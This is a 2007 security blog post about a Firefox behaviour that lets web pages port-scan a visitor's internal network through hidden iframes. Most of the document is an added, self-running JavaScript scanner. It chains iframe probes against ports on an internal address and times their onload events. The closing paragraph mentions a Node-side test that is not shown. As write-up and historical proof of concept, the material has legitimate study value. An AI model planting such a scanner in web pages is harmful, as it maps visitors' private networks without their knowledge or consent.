Sunday, January 21, 2007

Port Scanning Clients via IFRAME

Via Ha.ckers.org -

A recent thread on sla.ckers.org discussing a vulnerability in neopets actually got me thinking. Spikeman posted that you could detect once the page had completed loading in an iframe using an onload event handler. More timing attacks anyone? Well, that’s not all. In Firefox it actually has a peculiar behavior. In IE (as it should) the onload event handler works all the time, because the page has finished loading. In Firefox it doesn’t fire if the browser encounters an error. An error could be something as simple as the server not being up (I have not tested with other server errors).

This proof of concept shows the difference (try in IE and Firefox to see the difference). You can see that in Firefox a series of iframes can be chained together to do port scanning (including Intranet port scanning). This is obviously a known issue when talking about JavaScript includes, but this is the first time I’ve heard of anyone discussing using an iframe for this purpose. Yet another way to do cross domain leakage (and cross firewall leakage at that). Thanks to Spikeman for alerting me to the onload event handler in iframes.
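The mechanics described above, written out as an added example (this is not the ha.ckers.org proof of concept and not code from the original post): each probe creates a hidden iframe pointed at host:port, waits for onload, and treats a missing onload before a timeout as "closed or filtered", which is the Firefox-era behaviour the post relies on. The probes are chained one after another, as in the PoC. The host 10.0.0.1 and the port list are constructed sample input; the timeout value is an assumption. The probe function is injected so the scanning logic can be exercised without a DOM; in a browser the page-level code at the bottom wires in the real iframe probe.

```javascript
// Iframe-onload port scan (added example; illustrates the post's technique).
// Caveat: this relied on 2007-era Firefox not firing onload on a load error.
// Current browsers generally fire onload for their own error pages and refuse
// to connect to many non-HTTP ports, so treat this as a historical PoC.

const DEFAULT_TIMEOUT_MS = 3000; // assumption: how long to wait for onload

// URL the hidden frame is pointed at. Only reachability matters, not content.
function probeUrl(host, port) {
  return `http://${host}:${port}/`;
}

// Browser probe: resolves when the frame's onload fires, never resolves
// otherwise (the caller enforces the timeout). Returns a cleanup function
// alongside the promise so the frame can be removed either way.
function iframeProbe(url, doc) {
  const frame = doc.createElement('iframe');
  frame.style.display = 'none';
  const loaded = new Promise((resolve) => {
    frame.onload = () => resolve();
  });
  frame.src = url;
  doc.body.appendChild(frame);
  loaded.cleanup = () => frame.remove();
  return loaded;
}

// Race the probe against a timer: true if onload fired in time, else false.
function withTimeout(promise, ms) {
  let timer;
  const timedOut = new Promise((resolve) => {
    timer = setTimeout(() => resolve(false), ms);
  });
  return Promise.race([promise.then(() => true), timedOut]).finally(() => {
    clearTimeout(timer);
    if (typeof promise.cleanup === 'function') promise.cleanup();
  });
}

// Chain the probes serially, one frame at a time, as the PoC's chained
// iframes do. `probe(url)` is injected: the iframe probe in a browser, a
// fake in tests. Result per port: 'open' (onload fired) or 'closed'
// (no onload before the timeout; closed or filtered are indistinguishable).
async function scan(host, ports, probe, timeoutMs = DEFAULT_TIMEOUT_MS) {
  const results = {};
  for (const port of ports) {
    const fired = await withTimeout(probe(probeUrl(host, port)), timeoutMs);
    results[port] = fired ? 'open' : 'closed';
  }
  return results;
}

// Browser entry point: only runs when a DOM is present.
if (typeof document !== 'undefined') {
  const target = '10.0.0.1'; // constructed sample target
  scan(target, [22, 80, 443, 8080], (url) => iframeProbe(url, document))
    .then((r) => console.log(target, r));
}
```

To adapt the Node-side test to what the post observed, the injected probe resolves for the "server up" case and hangs for the "server down" case, which is exactly the distinction the onload handler gives in the affected Firefox build; in IE, onload fires in both cases, so every port would report 'open' and the scan tells you nothing.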
